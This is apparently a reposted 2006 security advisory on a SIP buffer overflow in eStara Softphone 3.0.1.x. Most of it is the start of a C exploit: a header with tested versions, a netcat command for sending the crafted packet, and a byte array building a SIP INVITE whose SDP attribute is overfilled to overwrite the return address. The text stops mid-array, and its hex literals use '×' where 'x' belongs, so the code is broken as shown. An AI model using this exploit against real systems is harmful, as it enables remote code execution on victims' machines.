http://www.securityfocus.com/archive/1/421596/30/0/threaded
eStara Softphone is a SIP softphone. There exists a buffer overflow
venerability in the SIP stack when a SIP packet with SDP data, and the
data length of the attribute filed ("a") large than 4021 bytes.
By exploiting this buffer overflow, an attacker can potentially gain
control of the return address of the executing function, allowing
arbitrary code execution with logon user’s privileges.
eStara Softphone 3.0.1.14 and 3.0.1.46(latest) are vulnerable. the others may also be affected.
===============exploit.c=====================
/***************************************
eStara Softphone buffer overflow exploit
tested on :
eStara Softphone 3.0.1.14
||||||
eStara Softphone 3.0.1.46
Vender website : http://www.estara.com/softphone/softph.exe
Run this application, then use nc to send builded packet :
nc -u 127.0.0.1 5060 <sip_overflow_exploit.dat
It will display a "hack" dialogbox in the target if it runs softphone.
Author : ZwelL
Mail : zwell (at) sohu (dot) com [email concealed]
WebSite : http://www.donews.net/zwell
Data : 2006.01.11
**************************************/
#include <windows.h>
#include <stdio.h>
unsigned char invite[] = {
0×49, 0×4E, 0×56, 0×49, 0×54, 0×45, 0×20, 0×73, 0×69, 0×70, 0×3A, 0×61, 0×40, 0×31, 0×32, 0×37,
0×2E, 0×30, 0×2E, 0×30, 0×2E, 0×31, 0×20, 0×53, 0×49, 0×50, 0×2F, 0×32, 0×2E, 0×30, 0×0D, 0×0A,
0×56, 0×69, 0×61, 0×3A, 0×20, 0×53, 0×49, 0×50, 0×2F, 0×32, 0×2E, 0×30, 0×2F, 0×55, 0×44, 0×50,
0×20, 0×31, 0×37, 0×32, 0×2E, 0×31, 0×36, 0×2E, 0×33, 0×2E, 0×36, 0×3A, 0×33, 0×33, 0×33, 0×33,
0×3B, 0×62, 0×72, 0×61, 0×6E, 0×63, 0×68, 0×3D, 0×7A, 0×39, 0×68, 0×47, 0×34, 0×62, 0×4B, 0×30,
0×30, 0×30, 0×30, 0×34, 0×31, 0×37, 0×38, 0×7A, 0×39, 0×68, 0×47, 0×34, 0×62, 0×4B, 0×2E, 0×30,
0×30, 0×30, 0×30, 0×32, 0×46, 0×32, 0×41, 0×0D, 0×0A, 0×46, 0×72, 0×6F, 0×6D, 0×3A, 0×20, 0×34,
0×31, 0×37, 0×38, 0×20, 0×3C, 0×73, 0×69, 0×70, 0×3A, 0×61, 0×40, 0×31, 0×32, 0×37, 0×2E, 0×30,
0×2E, 0×30, 0×2E, 0×31, 0×3E, 0×3B, 0×74, 0×61, 0×67, 0×3D, 0×34, 0×31, 0×37, 0×38, 0×0D, 0×0A,
0×54, 0×6F, 0×3A, 0×20, 0×52, 0×65, 0×63, 0×65, 0×69, 0×76, 0×65, 0×72, 0×20, 0×3C, 0×73, 0×69,
0×70, 0×3A, 0×61, 0×40, 0×31, 0×32, 0×37, 0×2E, 0×30, 0×2E, 0×30, 0×2E, 0×31, 0×3E, 0×0D, 0×0A,
0×43, 0×61, 0×6C, 0×6C, 0×2D, 0×49, 0×44, 0×3A, 0×20, 0×32, 0×34, 0×34, 0×33, 0×30, 0×40, 0×31,
0×37, 0×32, 0×2E, 0×31, 0×36, 0×2E, 0×33, 0×2E, 0×36, 0×0D, 0×0A, 0×43, 0×53, 0×65, 0×71, 0×3A,
0×20, 0×31, 0×38, 0×32, 0×32, 0×35, 0×20, 0×49, 0×4E, 0×56, 0×49, 0×54, 0×45, 0×0D, 0×0A, 0×43,
0×6F, 0×6E, 0×74, 0×61, 0×63, 0×74, 0×3A, 0×20, 0×34, 0×31, 0×37, 0×38, 0×20, 0×3C, 0×73, 0×69,
0×70, 0×3A, 0×61, 0×40, 0×31, 0×32, 0×37, 0×2E, 0×30, 0×2E, 0×30, 0×2E, 0×31, 0×3E, 0×0D, 0×0A,
0×45, 0×78, 0×70, 0×69, 0×72, 0×65, 0×73, 0×3A, 0×20, 0×31, 0×32, 0×30, 0×30, 0×0D, 0×0A, 0×4D,
0×61, 0×78, 0×2D, 0×46, 0×6F, 0×72, 0×77, 0×61, 0×72, 0×64, 0×73, 0×3A, 0×20, 0×37, 0×30, 0×0D,
0×0A, 0×43, 0×6F, 0×6E, 0×74, 0×65, 0×6E, 0×74, 0×2D, 0×54, 0×79, 0×70, 0×65, 0×3A, 0×20, 0×61,
0×70, 0×70, 0×6C, 0×69, 0×63, 0×61, 0×74, 0×69, 0×6F, 0×6E, 0×2F, 0×73, 0×64, 0×70, 0×0D, 0×0A,
0×43, 0×6F, 0×6E, 0×74, 0×65, 0×6E, 0×74, 0×2D, 0×4C, 0×65, 0×6E, 0×67, 0×74, 0×68, 0×3A, 0×20,
0×34, 0×32, 0×32, 0×32, 0×0D, 0×0A, 0×0D, 0×0A, 0×76, 0×3D, 0×30, 0×0D, 0×0A, 0×6F, 0×3D, 0×34,
0×31, 0×37, 0×38, 0×20, 0×34, 0×31, 0×37, 0×38, 0×20, 0×34, 0×31, 0×37, 0×38, 0×20, 0×49, 0×4E,
0×20, 0×49, 0×50, 0×34, 0×20, 0×31, 0×37, 0×32, 0×2E, 0×31, 0×36, 0×2E, 0×33, 0×2E, 0×36, 0×0D,
0×0A, 0×73, 0×3D, 0×53, 0×65, 0×73, 0×73, 0×69, 0×6F, 0×6E, 0×20, 0×53, 0×44, 0×50, 0×0D, 0×0A,
0×63, 0×3D, 0×49, 0×4E, 0×20, 0×49, 0×50, 0×34, 0×20, 0×31, 0×37, 0×32, 0×2E, 0×31, 0×36, 0×2E,
0×33, 0×2E, 0×36, 0×0D, 0×0A, 0×74, 0×3D, 0×30, 0×20, 0×30, 0×0D, 0×0A, 0×6D, 0×3D, 0×61, 0×75,
0×64, 0×69, 0×6F, 0×20, 0×39, 0×38, 0×37, 0×36, 0×20, 0×52, 0×54, 0×50, 0×2F, 0×41, 0×56, 0×50,
0×20, 0×30, 0×0D, 0×0A, 0×61, 0×3D, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
